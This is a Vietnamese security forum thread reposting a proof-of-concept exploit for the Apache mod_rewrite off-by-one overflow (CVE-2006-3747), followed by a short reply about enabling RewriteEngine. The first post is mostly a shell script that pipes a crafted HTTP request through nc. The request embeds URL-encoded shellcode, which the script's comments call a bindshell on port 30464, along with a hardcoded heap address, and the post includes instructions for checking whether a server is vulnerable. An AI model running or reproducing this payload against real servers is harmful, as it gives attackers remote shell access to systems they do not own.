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Forum Index Thông tin new bugs và exploits Apache (mod_rewrite) Remote Overflow PoC  XML
  [Announcement]   Apache (mod_rewrite) Remote Overflow PoC 22/08/2006 22:05:28 (+0700) | #1 | 16943
HVA Friend

Joined: 14/04/2004 00:32:37
Messages: 200
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Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC



# To know if your apache vulnerable version could be successful
# exploited, write this rule in your httpd.conf or .htaccess file:

# RewriteRule kung/(.*) $1

# And try to access to the following URL:

# If your web server doesn't reply you with a '302 Found' page or a
# Segmentation Fault appears in your error_log, an apache child has
# crashed and your web server is vulnerable and exploitable.

# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# Thx to xuso for help me with the shellcode.
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice smilie
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
# Gulcas rulez smilie
echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
 echo "Usage: $0 webserver"


echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:$host\r\n\r\n" | nc $host 80

Great hopes make great men smilie
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  [Question]   Apache (mod_rewrite) Remote Overflow PoC 04/09/2006 18:07:46 (+0700) | #2 | 20561
HVA Friend

Joined: 29/12/2001 13:54:03
Messages: 82
[Profile] [PM]
# To know if your apache vulnerable version could be successful
# exploited, write this rule in your httpd.conf or .htaccess file:

# RewriteRule kung/(.*) $1

Nên thêm vào là:

# RewriteEngine On
# RewriteRule kung/(.*) $1

thì nó mới tác dụng.
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